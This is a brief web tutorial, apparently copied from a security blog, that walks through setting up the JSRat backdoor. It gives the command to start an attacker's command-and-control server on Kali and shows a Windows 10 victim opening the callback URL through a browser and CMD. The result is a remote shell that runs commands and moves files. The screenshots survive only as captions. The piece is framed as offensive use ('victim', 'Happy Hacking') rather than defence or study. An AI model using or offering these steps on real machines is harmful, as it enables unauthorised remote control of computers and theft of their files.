Backdoor  - FsB4e1515923472 - Secret Command & Control Channel Backdoor to Control Victims Machine

JsRat is python based script developed to victim  using JavaScript payloads and the HTTP protocol for communication between the server and the target hosts.

Here I have used Kali (Attacker Machine) and Victim Machine (Windows 10)

Installation & Setup :-

  • Download the JSRAT tool Here

- Screenshot 517 - Secret Command & Control Channel Backdoor to Control Victims Machine

  • Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

  • Run and execute the : python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080

 

- Screenshot 518 1 - Secret Command &#038; Control Channel Backdoor to Control Victims Machine

  • JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf

VICTIM MACHINE:-

  • Open this Client command URL with Victim browser

- Screenshot 514 - Secret Command &#038; Control Channel Backdoor to Control Victims Machine

  • To gain the shell payload generated by URL should be opened with CMD.

- Screenshot 515 - Secret Command &#038; Control Channel Backdoor to Control Victims Machine

  • Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE:-

  • Here we go !!! We have connected with Victim machine

- Screenshot 520 - Secret Command &#038; Control Channel Backdoor to Control Victims Machine

  • Let us try some windows command: Ipconfig

- Screenshot 519 - Secret Command &#038; Control Channel Backdoor to Control Victims Machine

- Screenshot 512 - Secret Command &#038; Control Channel Backdoor to Control Victims Machine

  • Above Figure shows executing the command calc opens up the windows calculator.JSRat can also provide upload, Read and Download files.Happy Hacking !!!



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here